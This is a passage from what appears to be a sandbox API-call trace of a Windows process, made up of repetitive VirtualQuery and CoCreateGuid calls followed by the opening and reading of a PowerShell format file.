lpBuffer=0x12c430*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.308] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xbae42109, Data2=0x5e8a, Data3=0x4663, Data4=([0]=0xbd, [1]=0x90, [2]=0xb5, [3]=0xaf, [4]=0x48, [5]=0x36, [6]=0x8b, [7]=0x90))) returned 0x0 [0068.309] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa6f22378, Data2=0x216f, Data3=0x407f, Data4=([0]=0xab, [1]=0xb5, [2]=0xac, [3]=0xad, [4]=0x2c, [5]=0x21, [6]=0x91, [7]=0xe6))) returned 0x0 [0068.309] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe4599914, Data2=0x8687, Data3=0x41ee, Data4=([0]=0x8d, [1]=0x29, [2]=0xd0, [3]=0x16, [4]=0x43, [5]=0xd5, [6]=0x5, [7]=0x6d))) returned 0x0 [0068.310] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x10634768, Data2=0x1d44, Data3=0x4ac9, Data4=([0]=0x8f, [1]=0x2e, [2]=0xc4, [3]=0x43, [4]=0xe2, [5]=0x99, [6]=0xf1, [7]=0x4))) returned 0x0 [0068.311] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xbe7f610d, Data2=0xbe66, Data3=0x4cec, Data4=([0]=0x84, [1]=0x67, [2]=0xe2, [3]=0xe8, [4]=0x88, [5]=0x52, [6]=0x50, [7]=0xb))) returned 0x0 [0068.312] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x40d6621f, Data2=0x6e95, Data3=0x4bb3, Data4=([0]=0x81, [1]=0xf5, [2]=0x60, [3]=0xbd, [4]=0x68, [5]=0xcf, [6]=0xe1, [7]=0xd2))) returned 0x0 [0068.312] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2e0931fe, Data2=0x835f, Data3=0x4f92, Data4=([0]=0x80, [1]=0xb7, [2]=0x2a, [3]=0xfb, [4]=0x68, [5]=0x3e, [6]=0x94, [7]=0xa3))) returned 0x0 [0068.312] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xc5e30999, Data2=0xf13, Data3=0x4483, Data4=([0]=0x9e, [1]=0x52, [2]=0xd3, [3]=0x6, [4]=0x21, [5]=0xb3, [6]=0x15, [7]=0x3a))) returned 0x0 [0068.312] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.313] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.313] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.313] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.313] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.314] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.314] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.314] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.315] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.315] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.315] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.316] VirtualQuery (in: lpAddress=0x12b130, lpBuffer=0x12bff0, dwLength=0x30 | out: lpBuffer=0x12bff0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.316] VirtualQuery (in: lpAddress=0x12b1c0, lpBuffer=0x12c080, dwLength=0x30 | out: lpBuffer=0x12c080*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.316] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.317] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.317] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.317] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.318] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.318] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.318] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.318] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x3ae23205, Data2=0x6d5d, Data3=0x4b2a, Data4=([0]=0x80, [1]=0xa0, [2]=0xbd, [3]=0x23, [4]=0x6a, [5]=0xdd, [6]=0x2b, [7]=0xd2))) returned 0x0 [0068.318] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.319] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.319] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.319] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.320] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.320] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.320] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.320] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.321] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.321] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.321] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.322] VirtualQuery (in: lpAddress=0x12ba40, lpBuffer=0x12c900, dwLength=0x30 | out: lpBuffer=0x12c900*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.322] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.322] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.322] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.323] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.323] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.323] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.324] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.324] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.324] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe4a429d6, Data2=0x3934, Data3=0x40eb, Data4=([0]=0x97, [1]=0xf2, [2]=0xf2, [3]=0x50, [4]=0xb7, [5]=0x2c, [6]=0xd0, [7]=0xc3))) returned 0x0 [0068.324] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.325] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.325] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.325] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.325] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.326] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.326] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.326] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.326] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.326] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.327] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.327] VirtualQuery (in: lpAddress=0x12b700, lpBuffer=0x12c5c0, dwLength=0x30 | out: lpBuffer=0x12c5c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.327] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.327] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.327] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.328] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.328] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x5c62b4d2, Data2=0x55a, Data3=0x497d, Data4=([0]=0xa4, [1]=0xb, [2]=0x46, [3]=0x4c, [4]=0x4d, [5]=0x86, [6]=0xd7, [7]=0x6))) returned 0x0 [0068.328] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x9dd8587c, Data2=0x9c6d, Data3=0x4dcb, Data4=([0]=0x8e, [1]=0x2d, [2]=0x9, [3]=0xf5, [4]=0xa, [5]=0x50, [6]=0xff, [7]=0xf8))) returned 0x0 [0068.328] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe021df46, Data2=0xbaa8, Data3=0x4fea, Data4=([0]=0xaf, [1]=0xea, [2]=0xb5, [3]=0xc3, [4]=0x8f, [5]=0x5, [6]=0x45, [7]=0xaf))) returned 0x0 [0068.329] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x8aab042, Data2=0x378d, Data3=0x4682, Data4=([0]=0x99, [1]=0xd5, [2]=0xb3, [3]=0x76, [4]=0x2a, [5]=0xa, [6]=0xca, [7]=0xc3))) returned 0x0 [0068.329] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xc5f34fef, Data2=0x1509, Data3=0x48a5, Data4=([0]=0xba, [1]=0x57, [2]=0xb7, [3]=0x78, [4]=0x49, [5]=0xa0, [6]=0x2a, [7]=0xda))) returned 0x0 [0068.329] VirtualQuery (in: lpAddress=0x12b810, lpBuffer=0x12c6d0, dwLength=0x30 | out: lpBuffer=0x12c6d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.330] VirtualQuery (in: lpAddress=0x12b8a0, lpBuffer=0x12c760, dwLength=0x30 | out: lpBuffer=0x12c760*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.330] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x903ce0ca, Data2=0xc014, Data3=0x457b, Data4=([0]=0x8a, [1]=0x4d, [2]=0xf9, [3]=0x48, [4]=0x6c, [5]=0x9c, [6]=0x27, [7]=0x3c))) returned 0x0 [0068.330] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xccde565a, Data2=0x47dd, Data3=0x489b, Data4=([0]=0xbd, [1]=0x97, [2]=0x57, [3]=0xcb, [4]=0x96, [5]=0x75, [6]=0x18, [7]=0xb3))) returned 0x0 [0068.330] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x4179b207, Data2=0xfd6b, Data3=0x4b73, Data4=([0]=0x88, [1]=0xc3, [2]=0x1c, [3]=0x75, [4]=0x8a, [5]=0x9, [6]=0x99, [7]=0x52))) returned 0x0 [0068.331] SetErrorMode (uMode=0x1) returned 0x1 [0068.331] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.331] SetErrorMode (uMode=0x1) returned 0x1 [0068.331] GetFileType (hFile=0x314) returned 0x1 [0068.331] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.332] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.332] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.333] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.333] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.333] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.333] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.333] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.334] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.334] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.334] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.334] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.335] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3abb140*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.335] ReadFile (in: hFile=0x314, lpBuffer=0x3abb140, 